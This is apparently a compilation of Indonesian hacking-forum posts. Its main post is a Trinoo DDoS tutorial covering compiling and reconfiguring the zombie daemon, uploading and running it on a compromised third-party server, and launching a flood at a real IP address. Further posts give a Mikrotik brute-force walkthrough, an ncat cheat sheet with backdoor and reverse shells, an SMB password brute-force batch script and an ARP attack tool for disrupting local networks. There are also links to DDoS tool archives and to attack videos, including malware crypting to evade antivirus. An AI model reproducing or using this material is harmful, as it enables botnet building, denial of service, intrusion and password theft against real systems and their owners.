Trinoo merupakan tool ddos yang sangat populer sejak dulu menggunakan sistem daemon slave sebagai zombie dan om server sebagai pengontrol attack. Ok trinoo ini pada jaman dulu bisa melakukan pengembangan jaringan zombie otomatis dengan scanning range ip poblik lalu melakukan eskploitasi terhadap bug lama wu ftpd , dll untuk dijadikan zombie.
pertama download dulu trinoo dan ekstrak:
Code:
wget http://packetstormsecurity.org/distributed/trinoo.tgz
tar zxvf trinoo.tgz
Mari saya jelaskan isinya trinoo dan gimana cara kerjanya:

Code:
bt trinoo # ls
BENSUQS  daemon/  om/  password  trinoo.tgz

yang ada di folder daemon adalah yang akan kita pasang di zombie kita yaitu mesin2 yang sudah kita owned.

Mengedit dan menyetting daemon trinoo
Untuk mengkompile daemon trinoo ini membutuhkan lib crypt dalam glibc.
Mari kita kompile Daemon trinoo gunakan perintah ini:
Code:
bt daemon # gcc -o ns ns.c -lcrypt
bt daemon #

Source code asli dari compare password pada daemon trinoo adalah:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {

Jadi kita bisa melihat bahwa fungsi:
crypt(pass, "aI"), "aIf3YWfOhw.V.")
plain text sebelum di crypt sebenarnya adalah: l44adsl

l44adsl ini adalah password default trinoo

crypt ini adalah one way hash yg tidak bisa didekrip sebenarnya.


di mana sintaks fungsi crypt ini adalah:

char * crypt (const char *key, const char *salt)


di mana daemon trinoo ini default akan bind port 27444/udp dengan default password l44adsl

Misal Anda ingin mengganti default password dan default port untuk daemon trinoo, gunakan tool yang saya buat ini:

Code:
/*Devilzc0de trinoo hash generator
programmer: mywisdom
*/
#include
#include
int main(int argc, char *argv[])
{
char *data;

int hasil;
hasil=crypt(argv[1], "aI");
printf("trinoo hash anda adalah:%s\n",hasil);
}

Selanjutnya kompile dan jalankan, misal saya ingin mencari hash dari password: mywisdom
Code:
bt ~ # gcc -o trinoo_hash trinoo_hash.c -lcrypt
trinoo_hash.c:13:2: warning: no newline at end of file
bt ~ # ./trinoo_hash mywisdom
trinoo hash anda adalah:aI3Kc25mvwsN2
bt ~ #

ok selanjutnya kita edit source daemon di ns.c di mana kita ganti hash password trinoo tadi yg line ini:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {

kita akan ubah menjadi:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aI3Kc25mvwsN2")==0) {

yang berarti password default daemon trinoo telah diganti menjadi: mywisdom

Sedangkan untuk mengganti default port trinoo misal kita mao ubah jadi port: 31337
kita ubah line ini di ns.c:
Code:
sa.sin_port = htons(27444);

menjadi:
Code:
sa.sin_port = htons(31337);


TErakhir jangan lupa setting alamat ip om dengan mengedit line berikut ini diganti alamat ip masternya:
Code:
char *om[] = {
  "129.237.122.40",
  "207.228.116.19",
  "209.74.175.130",
  NULL

penting!!! jangan lupa diganti alamat ip masternya klo gak tar jadi zombie orang!!!!

Selanjutnya kompile ulang daemon trinoo anda:
Code:
gcc -o ns ns.c -lcrypt

Ok selanjutnya silahkan upload dan run ke mesin yang sudah kita owned , misal:
Code:
bt daemon # ftp pcorders.com
Connected to pcorders.com.
220 ns3.pcorders.com FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (pcorders.com:root): mywisdom
331 Password required for mywisdom.
Password:
230 User mywisdom logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put ns
local: ns remote: ns
200 PORT command successful.
553 ns: Permission denied.
ftp> cd /tmp
250 CWD command successful.
ftp> put ns
local: ns remote: ns
200 PORT command successful.
150 Opening BINARY mode data connection for ns.
226 Transfer complete.
10814 bytes sent in 0.00175 secs (6.1e+03 Kbytes/sec)
ftp>                 
ftp> quit
221-You have transferred 10814 bytes in 1 files.
221-Total traffic for this session was 11363 bytes in 1 transfers.
221-Thank you for using the FTP service on ns3.pcorders.com.
221 Goodbye.
bt daemon # telnet pcorders.com
Trying 204.181.205.145...
Connected to pcorders.com.
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.12-20 on an i686
mlogin: mywisdom
Password:
Last login: Wed May  5 02:10:58 from 105.subnet125-160-218.speedy.telkom.net.id
[admin@ns3 admin]$ ptrace
[t@ns3 admin]# cd /tmp
[t@ns3 /tmp]# ./ns
sh: ./ns: Permission denied
[t@ns3 /tmp]# chmod +x ns
[t@ns3 /tmp]# ./ns

Ok sudah run secara demonize di mesin slave kita , mari kita liat bind portnya:
Code:
[t@ns3 /tmp]# netstat -a | grep udp
udp        0      0 *:1161                  *:*
udp        0      0 *:1160                  *:*
udp        0      0 *:1159                  *:*
udp        0      0 *:27444                 *:*
udp      224      0 ns3.pcorders.com:1156   192.168.1.1:domain      ESTABLISHED
udp      224      0 ns3.pcorders.com:1155   192.168.1.1:domain      ESTABLISHED
udp        0      0 *:ntalk                 *:*
udp        0      0 *:talk                  *:*
udp        0      0 *:sunrpc                *:*
[t@ns3 /tmp]#

ok keliatan kan ada listening port udp 27444?
Ok selanjutnya kita compile dan run daemon om di mesin yang kita owned yang mao kita jadikan om slave

Untuk mengganti password default om lakukan langkah yang sama tapi line yg diganti adalah file om.c ini:

#define CRYPTKEY "ZsoTN.cq4X31"

ok misal saya install masternya di alamat ip x.x.x.x:
Code:
http://yoyoparty.com/upload/
mywisdom@trin00-king~#make
gcc -o om master.c blowfish.c -lcrypt
blowfish.c: In function 'blowfish_init':
blowfish.c:131: warning: incompatible implicit declaration of built-in function 'strncpy'
blowfish.c: In function 'encrypt_string':
blowfish.c:192: warning: incompatible implicit declaration of built-in function 'strlen'
blowfish.c:194: warning: incompatible implicit declaration of built-in function 'strcpy'
blowfish.c: In function 'decrypt_string':
blowfish.c:232: warning: incompatible implicit declaration of built-in function 'strlen'
blowfish.c:234: warning: incompatible implicit declaration of built-in function 'strcpy'
strip om
mywisdom@trin00-king~#./om
??

ok instalasi trinoo om di x.x.x.x selesai,selanjutnya untuk mengakses trinoo shell dari localhost attacker :
Code:
mywisdom@trin00-king~#telnet x.x.x.x 27665
Trying x.x.x.x...
Connected to hostxxxxxxxx.
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]


trinoo>

Dalam contoh ini saya menggunakan password default:
betaalmostdone

untuk memerintahkan om slave melakukan ddos ketikkan perintah : dos alamat_ip_target
Code:
trinoo> dos 74.63.241.86
DoS: Packeting 74.63.241.86.
trinoo>

Ok untuk sementara sekian dulu dan terima kasih

aneka compiled tool ddos bisa didownload di
http://yoyoparty.com/upload/ddos_tools.tgz
dan
http://yoyoparty.com/upload/compiled_ddos2.tgz

regards
mywisdom
thanks:
devilzc0de crews and members. ycl crews and members, jasakom crews and members

hacking mikrotik

Yups ...
This is the first my tutorial in here.....

Server Microtik yang akan kita attack kita siapkan...
Bagi yang belum memliki brutus silahkan download link dibawah ini :

http://www.hoobie.net/brutus/brutus-download.html

yups...

sekarang kita akan coba menghack server mikrotik :
1. Jalankan brutusnya...
2. Masukkan IP Mikrotik server.

[Image: 2z70wau.jpg]
3. Sekarang kita akan menggunakan media telnet.

[Image: 55hs2r.jpg]
4. Pada user file silahkan diisi dengan file user.txt yang sudah kita persiapkan, biasa kita menggunakan dictionary attack...!

[Image: 2mmfexj.jpg]
5. Jangan lupa dictionary attack juga buat passwordnya :

[Image: 6pvmhd.jpg]
6. Nachhh... selesai dech..
7. Tinggal pencet start...
8. Tungguin tuh.....
9. Jika dictionary attack seperti ini ndak dapet...
10. Gunakan Brute force saja

[Image: sdegkx.jpg]

trick use Ncat

ncat adalah gabungan dari Nmap & netcat kedua tool ini merupakan
tool andalan para networker ataupun attacker

nih gw mau share sedikit ttg Ncat
karena gw juga lagi belajar makenya



Code:
Simple Banner grab:
C:\client>ncat google.com 80
GET / HTTP/1.1

Use as telnet client:
C:\client>ncat -t 192.168.1.1 23

Simple Web Server:
C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80

C:\server>ncat -l --keep-open 74 < stuff.txt
C:\client>ncat localhost 74


Copy file with UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt

Use Source port and source address:
C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1

Brokered connection to many hosts:
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

Simple Chat:
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

SSL Header Grab:
C:\client>ncat gmail.google.com 443
GET / HTTP/1.1

C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1

File transfer with SSL:
C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends self)

C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)

Simple proxy Server:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl

Normal Backdoor Shell:
Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23
Windows:
C:\server>ncat -l 23 -e cmd
ncat 192.168.159.129 23
Edit!!!!

Reverse Shell (AKA:Shovel a shell, and get past NAT and firewalls with week egress filtering):
ncat -l 74
C:\server>ncat 192.168.159.128 74 -e cmd

Another Crappy Web Server:
C:\server>ncat -l 80 -c "type http.txt"

Access control:
Windows:
C:\server>ncat -l 23 -e cmd --allow 192.168.159.128
ncat 192.168.159.129 23

Ncat relay:
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"

SMBBrute script

if the cain abel blocked...you can use it for brute in network....

Code:
@echo off
echo SMBrute Script,
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
del log.txt
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
echo *****Done*****

Win ARP attacker

Bagi teman2 yang suka jahilin orang di local network, mungkin sudah tahu keampuhan tool ini,Win ARP attacker. Tool ini sangat ampuh untuk melumpuhkan suatu jaringan local dengan cepat plus cara yang sangat mudah. Tinggal scan, lalu pilih attack type, kemudian lancarkan serangan. Nie ada beberapa screenshotnya:

[Image: 3743725-holder-c282f3624fe84a704ebc142bcfaa41d5.jpg]
[Image: 3743728-holder-112b177c982f5c6a6fbb2516d5a9847d.jpg]
[Image: 3743732-holder-ea29abc6125eb1cbd12eb9a6faac6feb.jpg]
[Image: 3743736-holder-476d4735075683cb6d0775a9a5d83571.jpg]
[Image: 3743777-holder-7417cd7e7d20da46730c0c3b427934aa.jpg]

Klo ada yang berminat mencoba silakan sedot di sini
Ane gak bermaksud ngajak jahil lho,cuma bagi ilmu n pengalaman aja...AlienAlien

All Stuff Video Remix

1. DeluxeBB 1.06 Exploit (9mb) Remote SQL Injection Exploit http://rapidshare.com/files/11156227/100_live585.rar

2. NetBios Live Hack (5mb) Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139) http://rapidshare.com/files/11158778/101_netbios585.rar

3. Classified (7mb) Shows how site classified is Hacked. http://rapidshare.com/files/11158779/102_site585.rar

4. NASA (2mb) NASA Department website Hacked. http://rapidshare.com/files/11158865/92_meh.zip

5. Linux Network Monitor (5mb) This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc http://rapidshare.com/files/11158774/95_...onitor.zip

6. Linux DNS Server (11mb) This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a om/slave relationship. This video is specifically tailored to setting up DNS for a web server. http://rapidshare.com/files/11158808/97_...Server.zip

7. Windows Web Server (6mb) This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro. http://rapidshare.com/files/11158787/98_...Server.zip

8. Win Server 2003 IIS and DNS (4mb) This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server. http://rapidshare.com/files/11158780/99_...nd_DNS.zip

9. Hacker Defender Movie (8mb) Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more. http://rapidshare.com/files/11158766/90_...e_MSV1.rar

10. 0-DAY Simple SQL Injection (8mb) A film project about a cracker with the name zer0day. (Hacking with Linux -php) http://rapidshare.com/files/11158799/89_...ection.zip

11. wbb (10mb) wbb portal hacked by XSS http://rapidshare.com/files/11158816/82_wbb_portal.rar

12. Reverse Engineering (20mb) Reverse Engineering with LD PRELOAD http://rapidshare.com/files/11158857/83_reverse.rar

13. SWF File Vulnerability Multiple Websites Embedded SWF File Vulnerability Demonstration

http://rapidshare.com/files/11158813/84_...l_Demo.rar

14. IPB 1.3 SQL (10mb) Invasion Power Board 1.3 SQL Injection Exploit http://rapidshare.com/files/11158768/86_IPB_SQL.rar

15. Qnix Buffer Overflows (11mb) Qnix Demonstrating Exploration of Simple Buffer Overflows http://rapidshare.com/files/11158770/87_buff.rar

16. ASP SQL (5mb) Simple ASP Administrator SQL Injection (5mb) http://rapidshare.com/files/11158795/88_asp_sql.rar

17. Blind MySQL (9mb) Demonstration of Blind MySQL Injection (bsqlbf) http://rapidshare.com/files/11158804/77_Blind_MySQL.rar

18. D-Link Wireless (3mb) Intruders D-Link Wireless Access Point Configuration Disclosure http://rapidshare.com/files/11158777/78_...reless.rar

19. Mysql bftools (8mb) Demonstration of Blind MySQL Injection (mysql_bftools) http://rapidshare.com/files/11158798/79_...ftools.rar

20. PHP Remote File (9mb) PHP Remote File Inclusion Windows Backdoor. http://rapidshare.com/files/11158805/80_PHP_Remote.rar

21. Cracking WEP in 10 Minutes (30mb) A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You’ll think twice about WEP after this http://rapidshare.com/files/11158904/75_...pcrack.zip

22. Tunneling Exploits via SSH (18mb) An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network. http://rapidshare.com/files/11158855/74_...neling.zip

23. A classic client side attack (18mb) The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site – MS06-001. http://rapidshare.com/files/11158860/76_...t-side.rar
24. C++ Video tutorials (29mb) Nice C/C++ Shockwave videos. http://rapidshare.com/files/11158892/70_C__.rar
25. Interview with Kevin Mitnick (12mb) He was on fbi’s most wanted list, a nitrous Hacker but now see Kevin’s Interview after being freed what he has to say about his past and future. http://rapidshare.com/files/11158829/68_kevin.rar

26. Unix Shell Fundamentals (40mb) VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos. http://rapidshare.com/files/11158906/69_...llFund.rar

27. Microsoft.com Bugs, Nice videos shows of old bug that was exploited on the site. http://rapidshare.com/files/11164765/67_MICROSOFT.rar

28. Bitfrost Server Crypting (15mb) This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt http://rapidshare.com/files/11164849/66_...r_Cryp.rar

29. WMF File Code Execution Vulnerability With Metasploit (38mb) This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help. http://rapidshare.com/files/11164775/50_...oitwmf.swf

30. SSH Dynamic Port Forwarding (30mb) I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH’s dynamic port forwarding (sort of a poor man’s VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients http://rapidshare.com/files/11164778/51_...arding.swf

31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb) In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart’s PE Builder from an ISO http://rapidshare.com/files/11164810/52_...livecd.swf

32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb) http://rapidshare.com/files/11164807/53_myslax.swf

33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb) http://rapidshare.com/files/11164773/54_vmxbuilder.swf

34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb) http://rapidshare.com/files/11164795/55_...intext.swf

35. Droop’s Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb) http://rapidshare.com/files/11164818/44_droops1.swf

36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb) http://rapidshare.com/files/11164827/45_wigle1.swf

37. Finding Rogue SMB File Shares On Your Network (60mb) http://rapidshare.com/files/11164821/46_...shares.swf

38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb) This video covers some intermediate and advanced Nmap options and is a follow-up to “Basic Nmap Usage” presentation. http://rapidshare.com/files/11164843/47_nmap2.swf

39. Metasploit Flash Tutorial. This video covers the use of Metasploit, launched from the Auditor Boot CD, to
compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do. http://rapidshare.com/files/11164788/48_metasploit1.swf

40. Using VirtualDub and a cheap webcam as a camcorder (10mb) I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder. http://rapidshare.com/files/11164832/49_...corder.avi
41. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb) http://rapidshare.com/files/11164783/37_...uditor.swf

MD5 Rainbow Crack Decrypt Your Hash With Your Self

Maaf kalo repost.... cuma mw sekedar share ttg crack md5 rainbow dgn metode sendiri :)

moga2 bisa menambah wawasan para mastah disini :)

Langsung aja cekibrot....

Explain The Program

THE EXPLAIN OF PROGRAM IN THREE PARTS :

1- Data Base Generation
2- Data Base Activation
3- Decryption

Step-Step :

1. The Program

2. Data Base Generation

3. Data Base Activation

LANGKAH SELANJUTNYA LANJUT DI KOMENT BAWAH ( Katanya kepanjangan prustasi )

Dan Link DownLoad :
http://rapidshare.com/files/273879300/Ra...HeLoNy.rar

Pass : megaturks.net

maaf kalo kepanjangan...soalnya ini sumber ane ambil dari tetangga sebelah hasil dari googling.... TQ bgt mbah gugle ..hehehe

Buat mastah-mastah...silahkan di kembangin, semoga wawasannya bertambah.... amin


DC Is The Best :)
LANGKAH LANJUTAN BOSS... Maaf Ga Cukup Disana :(

4. Decryption


Semoga Berguna.... amin sabar sabar sabar

ShoutMix chat widget